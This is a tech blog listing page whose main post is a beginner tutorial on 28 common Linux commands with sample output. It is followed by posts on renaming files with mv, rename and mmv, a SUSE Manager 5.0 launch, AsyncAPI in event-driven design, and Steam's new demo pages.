Home Blog Page 22

28 MOST FREQUENTLY USED BASIC LINUX COMMANDS WITH EXAMPLES

0
28 MOST FREQUENTLY USED BASIC LINUX COMMANDS WITH EXAMPLES

28 MOST FREQUENTLY USED BASIC LINUX COMMANDS WITH EXAMPLES

Introduction
In this article we are going to discuss on some most frequently used basic Linux commands with examples. This article is mainly useful for beginners who just started to learn Linux or want to learn Linux. In this topic we have included all those basic Linux commands by which you can easily operate Linux operating system easily from terminal.

So let’s have a look at basic Linux commands with examples
1. List Files & Directories using ls
## ls basic Linux commands with examples
To list files and directories in Linux we can use ls command. Refer the command below.

elinuxbook@ubuntu:~$ ls
app Desktop Documents Downloads file.txt Music Pictures Public Templates Videos

List files & Directories with some important details like Permissions, Owner, Symlink & Hardlink details, Created Date, File & Directories name.

elinuxbook@ubuntu:~$ ls -l
total 36
drwxrwxr-x 3 elinuxbook elinuxbook 4096 Aug 20 2017 app
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Desktop
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Documents
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Downloads
-rw-rwxrwx 1 elinuxbook elinuxbook 0 Feb 20 09:40 file.txt
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Music
drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Pictures

List Hidden files & directories.

elinuxbook@ubuntu:~$ ls -a
. .bash_history .cache Desktop Downloads .gnupg .lesshst Music .profile .sudo_as_admin_successful .Xauthority
.. .bash_logout .compiz .dmrc file.txt .HipChat .local Pictures Public Templates .xsession-errors
app .bashrc .config Documents .gconf .ICEauthority .mozilla .pki .QtWebEngineProcess Videos .xsession-er




List files & directories with it’s Inode number.

elinuxbook@ubuntu:~$ ls -li
total 36
284379 drwxrwxr-x 3 elinuxbook elinuxbook 4096 Aug 20 2017 app
278746 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Desktop
278760 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Documents
278757 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Downloads
134040 -rw-rwxrwx 1 elinuxbook elinuxbook 0 Feb 20 09:40 file.txt
278761 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Music
278762 drwxr-xr-x 2 elinuxbook elinuxbook 4096 Aug 20 2017 Pictures

## Basic Linux commands with examples to Manage Files & Directories
2. Create a Directory in Linux
Create a new directory in Linux using mkdir command.
elinuxbook@ubuntu:~$ mkdir data

3. Delete a Directory
Delete a directory using rmdir command.

elinuxbook@ubuntu:~$ rmdir data

4. Remove/Delete a file
Delete a file using rm command.
elinuxbook@ubuntu:~$ rm file.txt

To delete a directory with content we have to use rm command with argument -rf to delete it forcefully.
elinuxbook@ubuntu:~$ rm -rf data

## Basic Linux commands with examples to Manage Users

5. Create a New user in Linux
To create a new user in Linux you can use useradd command. Refer the command below.
elinuxbook@ubuntu:~$ sudo useradd helpdesk

Also Read :

6. Set Password for a User
Set password for a user using passwd command.

elinuxbook@ubuntu:~$ sudo passwd helpdesk
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

7. Delete a User
Delete a user using userdel command.
elinuxbook@ubuntu:~$ sudo userdel helpdesk

8. Change Permission in Linux
To change permission of files & directories in Linux you can use chmod command. Here I have shown some examples.
Allow Full access (i.e. Read, Write, Execute) to Owner/User for a file file.txt.

elinuxbook@ubuntu:~$ chmod u+rwx file.txt

Remove Write & Execute permission from Owner/User.
elinuxbook@ubuntu:~$ chmod u-wx file.txt

Allow Read, Write, Execute permission to everyone.
elinuxbook@ubuntu:~$ chmod a+rwx file.txt

You can also Allow Read, Write, Execute permission to everyone in Numerical method.

elinuxbook@ubuntu:~$ chmod 777 file.txt

9. Change Ownership of Files & Directories
You can change ownership of files & directories in Linux using chown command. The Syntax to change ownership is :
chown username:groupname filename
Change ownership of a file file.txt.

elinuxbook@ubuntu:~$ sudo chown elinuxbook:helpdesk file.txt

elinuxbook@ubuntu:~$ ls -l file.txt
-rw-rw-r– 1 elinuxbook helpdesk 0 Feb 21 07:52 file.txt

Change Group Ownership of a file using chown command.
elinuxbook@ubuntu:~$ sudo chown :elinuxbook file.txt

elinuxbook@ubuntu:~$ ls -l file.txt
-rw-rw-r– 1 elinuxbook elinuxbook 0 Feb 21 07:52 file.txt

## Basic Linux commands with examples for Backup
10. Backup data using Tar
Create a archive in Linux using Tar command.

elinuxbook@ubuntu:~$ tar -cvf file.tar file.txt

Create a Tar archive with gzip compression.
elinuxbook@ubuntu:~$ tar -czvf file.tar.gz file.txt

Extract a gzip compressed Tar archive.
elinuxbook@ubuntu:~$ tar -xzvf file.tar.gz

## Basic Linux commands with examples to compress files & directories

11. Compress Files & Directories using gzip command
Compress a file using gzip command.
elinuxbook@ubuntu:~$ gzip file.txt

Extract a gzip (.gz) compressed file.
elinuxbook@ubuntu:~$ gzip -d file.txt.gz

OR you can also use gunzip command to extract gzip compressed file.

elinuxbook@ubuntu:~$ gunzip file.txt.gz

## Basic Linux commands with examples to Shutdown the System.
12. Shutdown Linux Operating System
To immediately shutdown a linux system you can use  below command.
elinuxbook@ubuntu:~$ shutdown -h now

Shutdown a system after 10 minute.

elinuxbook@ubuntu:~$ shutdown -h +10

Cancel a scheduled Shutdown using shutdown command with argument -c.
elinuxbook@ubuntu:~$ shutdown -c

Reboot the system after 10 minute using shutdown command with argument -r.
elinuxbook@ubuntu:~$ shutdown -r +10

13. Compress files & directories using bzip2 compression
Compress a file using bzip2 command.

elinuxbook@ubuntu:~$ bzip2 test.txt

Extract a bzip2 compressed file (i.e. bz2) using bzip2 command with argument -d.
elinuxbook@ubuntu:~$ bzip2 -d test.txt.bz2

14. Copy files in Linux
You can copy files & directories in Linux using cp command. Here I am copying a file named file.txt in to a directory named data. Refer the command below.
Syntax : cp Source Destination

elinuxbook@ubuntu:~$ cp file.txt data/

15. Move/Rename file in Linux
Move OR Rename file in Linux using mv command.
Syntax : mv Source Filename Destination Filename
elinuxbook@ubuntu:~$ mv file.txt data/myfile.txt

16. Change Directory in Linux
Use cd command to Change Directory in Linux. Refer the command below.

elinuxbook@ubuntu:~$ cd data/

17. Check Current Working Directory
To check current working directory in Linux you can use pwd command. The full form of pwd is Print Working Directory. As you can see below my current working directory is “/home/elinuxbook“.
elinuxbook@ubuntu:~$ pwd
/home/elinuxbook

18. Create a New file
To create a new file in Linux you can use touch command.
elinuxbook@ubuntu:~$ touch file.txt

## ## Basic Linux commands with examples to check Process Status in Linux

19. Check Process Status in Linux
To check process status in Linux you can use ps command.
elinuxbook@ubuntu:~$ ps
PID TTY TIME CMD
2936 pts/4 00:00:03 bash
11022 pts/4 00:00:00 ps

ps command with argument -ef will show you Process Status in More details like User ID, Process ID, CPU utilization, Memory Utilization, Terminal Details and so on.
elinuxbook@ubuntu:~$ ps -ef | less

20. List connected Disks/Medias
You can List all connected Hardisks, Pen Drives and many more using fdisk command with argument -l. Refer the command below.

elinuxbook@ubuntu:~$ sudo fdisk -l
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xa5466322

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 37750783 37748736 18G 83 Linux
/dev/sda2 37752830 41940991 4188162 2G 5 Extended
/dev/sda5 37752832 41940991 4188160 2G 82 Linux swap / Solaris

## Basic Linux commands with examples to check Mounted Devices in Linux
21. List Mounted Devices in Linux
You can list all mounted devices in Human Readable format using df command with argument -h.
elinuxbook@ubuntu:~$ df -h
Filesystem Size Used Avail Use% Mounted on
udev 966M 0 966M 0% /dev
tmpfs 199M 14M 185M 7% /run
/dev/sda1 18G 4.9G 12G 30% /
tmpfs 992M 212K 992M 1% /dev/shm
tmpfs 5.0M 4.0K 5.0M 1% /run/lock
tmpfs 992M 0 992M 0% /sys/fs/cgroup
tmpfs 199M 64K 199M 1% /run/user/1000

Only df command will list mounted devices in Blocks.

elinuxbook@ubuntu:~$ df
Filesystem 1K-blocks Used Available Use% Mounted on
udev 988812 0 988812 0% /dev
tmpfs 203012 14032 188980 7% /run
/dev/sda1 18447100 5124524 12362476 30% /
tmpfs 1015056 212 1014844 1% /dev/shm
tmpfs 5120 4 5116 1% /run/lock
tmpfs 1015056 0 1015056 0% /sys/fs/cgroup
tmpfs 203012 64 202948 1% /run/user/1000

List mounted Devices with it’s Inode Numbers.
elinuxbook@ubuntu:~$ df -ih
Filesystem Inodes IUsed IFree IUse% Mounted on
udev 242K 459 241K 1% /dev
tmpfs 248K 683 248K 1% /run
/dev/sda1 1.2M 228K 925K 20% /
tmpfs 248K 9 248K 1% /dev/shm
tmpfs 248K 6 248K 1% /run/lock
tmpfs 248K 17 248K 1% /sys/fs/cgroup
tmpfs 248K 31 248K 1% /run/user/1000

## Basic Linux commands with examples to check Network Configurations
22. Check IP Address in Linux
To check IP Address in Linux you can use ifconfig command.

elinuxbook@ubuntu:~$ ifconfig
ens33 Link encap:Ethernet HWaddr 00:0c:29:ff:cd:2e
inet6 addr: 2405:204:f196:72e6:f609:9c3f:ccb7:8841/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:3f17:e549:58e6:254b/64 Scope:Global
inet6 addr: 2405:204:f196:72e6:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f109:105f:a531:82b3:8d4a:c712/64 Scope:Global
inet6 addr: 2405:204:f109:105f:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: fe80::b396:d285:b5b3:81c3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8909 errors:0 dropped:0 overruns:0 frame:0
TX packets:8903 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9662594 (9.6 MB) TX bytes:1080952 (1.0 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:61437 errors:0 dropped:0 overruns:0 frame:0
TX packets:61437 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4568449 (4.5 MB) TX bytes:4568449 (4.5 MB)

Use the below command to check IP Address of a particular Interface. Here I am checking IP Address of the Interface ens33.
elinuxbook@ubuntu:~$ ifconfig ens33
ens33 Link encap:Ethernet HWaddr 00:0c:29:ff:cd:2e
inet6 addr: 2405:204:f196:72e6:f609:9c3f:ccb7:8841/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:3f17:e549:58e6:254b/64 Scope:Global
inet6 addr: 2405:204:f196:72e6:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f211:47d8:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: 2405:204:f109:105f:a531:82b3:8d4a:c712/64 Scope:Global
inet6 addr: 2405:204:f109:105f:69be:db2b:9c8a:6051/64 Scope:Global
inet6 addr: fe80::b396:d285:b5b3:81c3/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8909 errors:0 dropped:0 overruns:0 frame:0
TX packets:8903 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9662594 (9.6 MB) TX bytes:1080952 (1.0 MB)

## Basic Linux commands with examples for Package Installation.
23. Install Packages in Linux using rpm command
You can use rpm command to install a package in Linux.

[root@elinuxbook ~]# rpm -ivh dhcp-3.0.5-23.el5.x86_64.rpm
warning: dhcp-3.0.5-23.el5.x86_64.rpm: Header V3 DSA signature: NOKEY, key ID 37017186
Preparing… ########################################### [100%]
1:dhcp ########################################### [100%]

rpm command with argument -qc will list configuration files of a particular package. Here I am listing configuration files of package Vsftpd FTP Server.
[root@elinuxbook ~]# rpm -qc vsftpd
/etc/logrotate.d/vsftpd.log
/etc/pam.d/vsftpd
/etc/vsftpd/ftpusers
/etc/vsftpd/user_list
/etc/vsftpd/vsftpd.conf
/etc/vsftpd/vsftpd_conf_migrate.sh

Update a installed package from It’s lower version to higher version using below command.
[root@localhost ~]# rpm -Uvh dhcp-4.1.1-51.P1.el6.centos.x86_64.rpm
Preparing… ########################################### [100%]
1:dhcp ########################################### [100%]

24. Install Package in Linux using yum command
Install a Package in Linux using yum command. Refer the command below.

[root@elinuxbook ~]# yum install dhcp
Loaded plugins: fastestmirror, refresh-packagekit, security
Setting up Install Process
Loading mirror speeds from cached hostfile
* base: mirror.nbrc.ac.in
* extras: mirrors.nhanhoa.com
* updates: centos-hcm.viettelidc.com.vn
base | 3.7 kB 00:00
extras | 3.4 kB 00:00
updates | 3.4 kB 00:00
Resolving Dependencies
–> Running transaction check
—> Package dhcp.x86_64 12:4.1.1-51.P1.el6.centos will be installed
–> Finished Dependency Resolution

Dependencies Resolved

================================================================================
Package Arch Version Repository Size
================================================================================
Installing:
dhcp x86_64 12:4.1.1-51.P1.el6.centos base 823 k
.
.
Installed:
dhcp.x86_64 12:4.1.1-51.P1.el6.centos

Complete!

You can List installed packages using below command.
[root@elinuxbook ~]# yum list installed

List most recently installed packages using below command.
[root@elinuxbook ~]# yum list recent
Loaded plugins: fastestmirror, refresh-packagekit, security
Loading mirror speeds from cached hostfile
* base: mirror.nbrc.ac.in
* extras: centos-hn.viettelidc.com.vn
* updates: centos-hn.viettelidc.com.vn
Recently Added Packages
openjpeg.x86_64 1.3-16.el6_8 updates
openjpeg-devel.i686 1.3-16.el6_8 updates
openjpeg-devel.x86_64 1.3-16.el6_8 updates
openjpeg-libs.i686 1.3-16.el6_8 updates
openjpeg-libs.x86_64 1.3-16.el6_8 updates
tomcat6.noarch 6.0.24-105.el6_8 updates
tomcat6-admin-webapps.noarch 6.0.24-105.el6_8 updates

25. Check your installed Operating System details using uname command
Just uname command will show you the name of your currently installed operating system name.

elinuxbook@ubuntu:~$ uname
Linux

uname command with argument -a will display Operating System Name, Kernel Version, OS architecture and so on.
elinuxbook@ubuntu:~$ uname -a
Linux ubuntu 4.13.0-32-generic #35~16.04.1-Ubuntu SMP Thu Jan 25 10:13:43 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

uname command with argument -o will show your operating system type. Here It’s GNU/Linux.
elinuxbook@ubuntu:~$ uname -o
GNU/Linux

## Basic Linux commands with examples to check Network Connectivity.

26. Check Network connectivity in Linux using ping command
You can check network connectivity in Linux using ping command by sending packets. Refer the command below.
elinuxbook@ubuntu:~$ ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.393 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.083 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.091 ms

— localhost ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 3035ms
rtt min/avg/max/mdev = 0.083/0.164/0.393/0.132 ms

Normally ping command send’s unlimited packets. But you can ask ping command to send fixed packets by using argument -c. Here I wanted 3 packets hence set -c as 3. Refer the command below.
elinuxbook@ubuntu:~$ ping -c 3 localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.068 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.077 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms

— localhost ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 2017ms
rtt min/avg/max/mdev = 0.068/0.078/0.091/0.013 ms

ping command with argument -i will keep interval between packets as per mentioned time in Seconds. Here I have set Interval as 2 seconds.

elinuxbook@ubuntu:~$ ping -c 3 -i 2 localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.066 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.090 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.091 ms

— localhost ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 4028ms
rtt min/avg/max/mdev = 0.066/0.082/0.091/0.013 ms

27. Copy files & directories Securely over Network
You can copy files and directories in Linux over network using scp command. scp stands for Secure Copy.
scp root@10.10.0.125:/data/file.txt /root/

28. Securly take console/Remote of any system over network using ssh
Take remote of any system securely using ssh command. Refer the command below.
ssh root@10.10.0.125

Here we have tried to include all possible frequently used basic Linux commands with examples. If something missed out you can comment on comment box below.

If you found this article useful then Like us, Share this post on your preferred Social media, Subscribe our Newsletter OR if you have something to say then feel free to comment on the comment box below.

How to Rename a File in Linux using mv, rename & mmv

0
How to rename files in Linux (using mv, rename, mmv)

This blog post teaches you how to rename a file in Linux using multiple methods and commands.
Renaming files is a widespread process in the workday of a system administrator, developer, or regular Linux user. Renaming helps us keep a copy of the files and temporarily use other names while working on the server. The Linux operating system offers renaming files or directories via GUI, but when we are using or working on a server where hosted websites are located, we need to know the most used commands for renaming.

In the next paragraphs we will explain with examples three different commands for renaming files: mv, rename, and mmv.
Prerequisites

A server running Ubuntu 22.04 or any Linux OS (CentOS, Debian, or AlmaLinux)
User privileges: root or non-root user with sudo privileges

Rename a file in Lunix using the mv command
The mv command is a shortcut of the “move” and is one of the most used commands for moving files and directories between different paths. It is also a simple method of how to rename a file in Linux, which is the purpose of this blog post. The syntax of the mv is the following:

mv [OPTION]… [-T] SOURCE DEST
mv [OPTION]… SOURCE… DIRECTORY
mv [OPTION]… -t DIRECTORY SOURCE.

Let’s rename a text file using the mv command. List the content of the current directory:
root@host:/var/www/html# ls -al
total 8
drwxr-xr-x 2 root root 4096 Mar 2 09:41 .
drwxr-xr-x 3 root root 4096 Mar 2 09:13 ..
-rw-r–r– 1 root root 0 Mar 2 09:41 test.txt

To rename the test.txt file, execute the following command:
mv test.txt test-renamed.txt
List the content of the directory again:
-rw-r–r– 1 root root 0 Mar 2 09:41 test-renamed.txt
If you go one level up you can rename the html directory as well:
mv html html.backup
The mv command will apply to files and folders:
drwxr-xr-x 2 root root 4096 Mar 2 05:43 html.backup
Next example is to move, the file or directory to a different location on your server. Let’s move the html.backup to a different location:
mv html.backup/ /opt/
List the content of the opt directory:
root@host:/var/www# ls -al /opt/
drwxr-xr-x 2 root root 4096 Mar 2 09:43 html.backup

There are plenty of options that you can use with the mv command, such as:
-i Before overwriting we get a prompt
-f Overwrite without warning and prompting
-v Shows a verbose output

For more information about the mv command, you can check by executing the following command:
man mv
You will get a very long description of the mv command as an output.
Rename a file in Lunix using the rename command
To use the rename command, we need to install the rename package first with the following command:
apt install rename
Once installed, you can check the version with the command below:
rename -V
You will get output similar to this:
root@host:# rename -V
/usr/bin/rename using File::Rename version 1.30, File::Rename::Options version 1.10

The syntax for the rename command is the following:
rename [options] ‘s/[pattern]/[replacement]/’ [file name]
Let’s say that we have three different text files:
root@host:/var/www# ls -al
-rw-r–r– 1 root root 0 Mar 2 10:38 file1.txt
-rw-r–r– 1 root root 0 Mar 2 10:38 file2.txt
-rw-r–r– 1 root root 0 Mar 2 10:38 file3.txt

To rename all these files with the rename you need to execute the following command:
rename ‘s/txt/backup/’ *.txt
If you list the content now, you will see the following output:
root@host:/var/www# ls -al
-rw-r–r– 1 root root 0 Mar 2 10:38 file1.backup
-rw-r–r– 1 root root 0 Mar 2 10:38 file2.backup
-rw-r–r– 1 root root 0 Mar 2 10:38 file3.backup

To know more about the rename command you can execute the man rename in your command line.
root@host:# man rename
RENAME(1p) User Contributed Perl Documentation RENAME(1p)

NAME
rename – renames multiple files

SYNOPSIS
rename [ -h|-m|-V ] [ -v ] [ -0 ] [ -n ] [ -f ] [ -d ] [ -u [enc]] [ -e|-E perlexpr]*|perlexpr [ files ]

DESCRIPTION
“rename” renames the filenames supplied according to the rule specified as the first argument. The perlexpr argument is a Perl expression which is expected
to modify the $_ string in Perl for at least some of the filenames specified. If a given filename is not modified by the expression, it will not be
renamed. If no filenames are given on the command line, filenames will be read via standard input.

Examples (Larry Wall, 1992)
For example, to rename all files matching “*.bak” to strip the extension, you might say

rename ‘s/\.bak$//’ *.bak

To translate uppercase names to lower, you’d use

rename ‘y/A-Z/a-z/’ *

Rename a file in Lunix using the mmv command
The mmv command is used for moving, copying, appending, and linking source files to the target file specified with the pattern.
If we want to use the mmv command we need to install the mmv packet first.
apt install mmv
The syntax of the mmv command is the following one:
mmv [-m|x|r|c|o|a|l|s] [-h] [-d|p] [-g|t] [-v|n] [–] [from to]
The usage is simple. To rename the file1.backup file back to file1.txt execute the following command:
mmv file1.backup file1.txt
If you want to know more information about this command, you can execute man mmv command in your prompt:
root@host:/var/www# man mmv
MMV(1) General Commands Manual MMV(1)

NAME
mmv – move/copy/append/link multiple files by wildcard patterns

SYNOPSIS
mmv [-m|x|r|c|o|a|l|s] [-h] [-d|p] [-g|t] [-v|n] [–] [from to]

EXAMPLES
Rename all *.jpeg files in the current directory to *.jpg:

mmv ‘*.jpeg’ ‘#1.jpg’

Replace the first occurrence of abc with xyz in all files in the current directory:

mmv ‘*abc*’ ‘#1xyz#2’

Rename files ending in .html.en, .html.de, etc. to ending in .en.html, .de.html, etc. in the current directory:

mmv ‘*.html.??’ ‘#1.#2#3.html’

Rename music files from – – .ogg to – – .ogg in the current directory:

mmv ‘* – * – *.ogg’ ‘#2 – #1 – #3.ogg’

That’s it. You successfully renamed files and directories using different methods and commands.
PS. If you liked this post on how to rename files in Linux, please share it with your friends on social networks or simply leave a comment in the comments section. Thank you.

Next Gen Mixed Linux Management

0
Options for Running Rancher on AWS

Today is a special day at SUSE: We are launching the next generation of SUSE Manager – SUSE Manager 5.0. You might be thinking that SUSE Manager has been around forever. While that is true, this release of SUSE Manager really is special – the server is now being delivered in a container image running on Podman. This is not only a generational leap for SUSE Manager but will bring multiple benefits to you.
In this blog, we’ll focus on just three of the reasons why you should consider SUSE Manager 5.0 for multi Linux management in your data center.

Containerization for resilience, simplification and flexibility
With this release of SUSE Manager, the SUSE Manager Server is now a container – providing all the benefits that containerization brings – chief among them resilience and simplicity. Containerization brings two main benefits to you:

Decouples the SUSE Manager Server from the underlying operating system. This is important because it lets your admins take advantage of the newest features of SUSE Manager as we roll them out without worrying about what affects they will have on the operating system.
Resiliency in case of failure. Should the SUSE Manager server fail for any reason, containerization makes it incredibly easy to recover. All your admins have to do is spin up another container and reattach the database. This frees your admins up to do higher level tasks.

Native Enterprise Linux support to improve mixed Linux management
SUSE Manager supports a number of Enterprise Linux distributions, including RHEL, Rocky and Alma Linux, CentOS and, of course, SUSE Liberty Linux. SUSE Manager 5.0 now has native package management Appstream support. Why is this important?  It’s important because now your admins no longer have to do complicated work to get patches because:

Appstream repos are properly parsed
Metadata is now understood by SUMA 5
There is no need to “flatten” the repos
dnf and SUMA agree

You can look for additional enhancements to follow in upcoming releases. Because with SUSE Manager, we really do make good on our promise of “We make Linux, but manage many.”
Enhanced features providing even greater security
With 60% of cyberattacks caused by unpatched servers and that the average cost of a data breach in 2024 is estimated to be $4.5 million, a 12% increase from 2020. Cyberattacks are not only financially costly, but also lead to customer mistrust.
SUSE Manager is known for automated patch management providing security and compliance. With this release, we enhance our security posture. SUSE Manager 5.0 provides:

Improved CVE scans including integrated OVAL data.
Use as an attestation server for specific servers for proven confidential computing

SUSE Manager is proven open source mixed Linux IT management.  Now that you’ve gotten a glimpse into SUSE Manager 5.0, we invite you to:

As always, we want to know what you think!
(Visited 1 times, 1 visits today)

Bridging Design and Runtime Gaps: AsyncAPI in Event-Driven Architecture

0
Bridging Design and Runtime Gaps: AsyncAPI in Event-Driven Architecture

The AsyncAPI specification emerged in response to the growing need for a standardized and comprehensive framework that addresses the challenges of designing and documenting asynchronous APIs. It is a collaborative effort of leading tech companies, open source      communities, and individual contributors who actively participated in the creation and evolution of the AsyncAPI specification. 

Various approaches exist for implementing asynchronous interactions and APIs, each tailored to specific use cases and requirements. Despite this diversity, these approaches fundamentally share a common baseline of key concepts. Whether it’s messaging queues, event-driven architectures, or other asynchronous paradigms, the overarching principles remain consistent. 

Leveraging this shared foundation, AsyncAPI taps into a spectrum of techniques, providing developers with a unified understanding of essential concepts. This strategic approach not only fosters interoperability but also enhances flexibility across various asynchronous implementations, delivering significant benefits to developers.

The design time and runtime refer to distinct phases in the lifecycle of an event-driven system, each serving distinct purposes:

Design time: This phase occurs during the design and development of the event-driven system, where architects and developers plan and structure the system engaging in activities around:

Designing event flows

Schema definition

Topic or channel design

Error handling and retry policies

Security considerations

Versioning strategies

Metadata management

Testing and validation

Documentation

Collaboration and communication

Performance considerations

Monitoring and observability

The design phase yields assets, including a well-defined and configured messaging infrastructure. This encompasses components such as brokers, queues, topics/channels, schemas, and security settings, all tailored to meet specific requirements. The nature of these assets may vary based on the choice of the messaging system.

Runtime: This phase occurs when the system is in operation, actively processing events based on the design-time configurations and settings, responding to triggers in real time.

Dynamic event routing

Concurrency management

Scalability adjustments

Load balancing

Distributed tracing

Alerting and notification

Adaptive scaling

Monitoring and troubleshooting

Integration with external systems

The output of this phase is the ongoing operation of the messaging platform, with messages being processed, routed, and delivered to subscribers based on the configured settings.

AsyncAPI plays a pivotal role in the asynchronous API design and documentation. Its significance lies in standardization, providing a common and consistent framework for describing asynchronous APIs. AsyncAPI details crucial aspects such as message formats, channels, and protocols, enabling developers and stakeholders to understand and integrate with asynchronous systems effectively. 

It should also be noted that the AsyncAPI specification serves as more than documentation; it becomes a communication contract, ensuring clarity and consistency in the exchange of messages between different components or services. Furthermore, AsyncAPI facilitates code generation, expediting the development process by offering a starting point for implementing components that adhere to the specified communication patterns.

In essence, AsyncAPI helps bridge the gap between design-time decisions and the practical implementation and operation of systems that rely on asynchronous communication.

Let’s explore a scenario involving the development and consumption of an asynchronous API, coupled with a set of essential requirements:

Designing an asynchronous API in an event-driven architecture (EDA):

Define the events, schema, and publish/subscribe permissions of an EDA service

Expose the service as an asynchronous API

Generating AsyncAPI specification:

Use the AsyncAPI standard to generate a specification of the asynchronous API

Utilizing GitHub for storage and version control:

Check in the AsyncAPI specification into GitHub, leveraging it as both a storage system and a version control system

Configuring GitHub workflow for document review:

Set up a GitHub action designed to review pull requests (PRs) related to changes in the AsyncAPI document

If changes are detected, initiate a validation process

Upon a successful review and PR approval, proceed to merge the changes

Synchronize the updated API design with the design time

This workflow ensures that design-time and runtime components remain in sync consistently. The feasibility of this process is grounded in the use of the AsyncAPI for the API documentation. Additionally, the AsyncAPI tooling ecosystem supports validation and code generation that makes it possible to keep the design time and runtime in sync.

Let us consider Solace Event Portal as the tool for building an asynchronous API and Solace PubSub+ Broker as the messaging system. 

An event portal is a cloud-based event management tool that helps in designing EDAs. In the design phase, the portal facilitates the creation and definition of messaging structures, channels, and event-driven contracts. Leveraging the capabilities of Solace Event Portal, we model the asynchronous API and share the crucial details, such as message formats, topics, and communication patterns, as an AsyncAPI document.

We can further enhance this process by providing REST APIs that allow for the dynamic updating of design-time assets, including events, schemas, and permissions. GitHub actions are employed to import AsyncAPI documents and trigger updates to the design-time assets. 

The synchronization between design-time and runtime components is made possible by adopting AsyncAPI as the standard for documenting asynchronous APIs. The AsyncAPI tooling ecosystem, encompassing validation and code generation, plays a pivotal role in ensuring the seamless integration of changes. This workflow guarantees that any modifications to the AsyncAPI document efficiently translate into synchronized adjustments in both design-time and runtime aspects. 

Keeping the design time and runtime in sync is essential for a seamless and effective development lifecycle. When the design specifications closely align with the implemented runtime components, it promotes consistency, reliability, and predictability in the functioning of the system. 

The adoption of the AsyncAPI standard is instrumental in achieving a seamless integration between the design-time and runtime components of asynchronous APIs in EDAs. The use of AsyncAPI as the standard for documenting asynchronous APIs, along with its robust tooling ecosystem, ensures a cohesive development lifecycle. 

The effectiveness of this approach extends beyond specific tools, offering a versatile and scalable solution for building and maintaining asynchronous APIs in diverse architectural environments.

AuthorPost contributed by Giri Venkatesan, Solace 

Valve gives developers some big reasons to add a demo on Steam

0
Valve gives developers some big reasons to add a demo on Steam

Valve have overhauled the way game demos work on Steam in some big ways, and it sounds like a really good thing for both developers and players.
Announced on Steam, demos can now have their own full store page. This allows developers to accurately describe the demo with what features the demo specifically offers, along with all the usual bits like trailers and screenshots. This will also display a banner linking back to the full game.
This also means you can directly follow a demo page, to be notified when it’s actually live. Nice! It also gives players the ability to review the demo too.
Demos will also appear across Steam in various places, acting as if they’re a free game. So you can expect to see them in charts like New & Trending and across all the tags. This sounds good, but I imagine this will also increase the complaints from developers on their new releases being quickly pushed down by demo releases. Still, nice for players to find them easier.
Demos also have their behaviour tweaked for your Steam Library:

You can add demos to your library without having to immediately install them. Just click on the new “add to library” button next to demos you may not be ready to install (while using the mobile app, for instance).
Demos can be installed even if you already own the full game. Primarily, this will make it easier for developers to test demos, but it will also help players more easily manage installing/uninstalling demos.
Demos can be explicitly removed from an account by right-clicking > manage > remove from account.
When a demo is uninstalled, it will automatically get removed from your library.

Check out some demos on Steam.
Article taken from GamingOnLinux.com.

(Updated) Radxa Teases Upgraded ROCK 5B+ SBC with LPDDR5 RAM and Onboard Wi-Fi 6 Radxa Teases Upgraded ROCK 5B+ SBC with LPDDR5 RAM and Onboard Wi-Fi 6

0
(Updated) Radxa Teases Upgraded ROCK 5B+ SBC with LPDDR5 RAM and Onboard Wi-Fi 6 Radxa Teases Upgraded ROCK 5B+ SBC with LPDDR5 RAM and Onboard Wi-Fi 6

